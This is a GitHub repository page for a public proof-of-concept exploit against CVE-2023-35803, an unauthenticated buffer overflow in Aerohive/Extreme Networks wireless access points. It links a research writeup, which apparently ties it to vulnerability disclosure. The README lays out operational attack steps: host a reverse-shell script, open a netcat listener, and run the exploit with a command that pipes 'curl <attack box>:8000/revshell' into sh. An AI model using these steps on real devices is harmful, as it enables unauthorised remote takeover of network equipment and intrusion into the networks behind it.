Skip to content
/ CVE-2023-35803 Public

PoC Exploit for CVE-2023-35803 Unauthenticated Buffer Overflow in Aerohive HiveOS/Extreme Networks IQ Engine

research.aurainfosec.io/pentest/bee-yond-capacity/
22 stars 4 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

lachlan2k/CVE-2023-35803

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 
gdbstatic
gdbstatic
 
 
poc.py
poc.py
 
 
revshell
revshell
 
 

Repository files navigation

CVE-2023-35803 - Unauthenticated RCE in Extreme Networks/Aerohive Wireless Access Points

PoC for ARM-based access points running HiveOS/IQ Engine <10.6r2.

  1. Edit revshell to point to your shell catcher IP/port
  2. Host the reverse shell: python3 -m http.server
  3. Open a shell catcher: nc -lvnp 1337
  4. Run the POC (may take a few minutes): python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"

Writeup here: https://research.aurainfosec.io/pentest/bee-yond-capacity/

About

PoC Exploit for CVE-2023-35803 Unauthenticated Buffer Overflow in Aerohive HiveOS/Extreme Networks IQ Engine

research.aurainfosec.io/pentest/bee-yond-capacity/

Resources

Readme
Activity

Stars

22 stars

Watchers

2 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages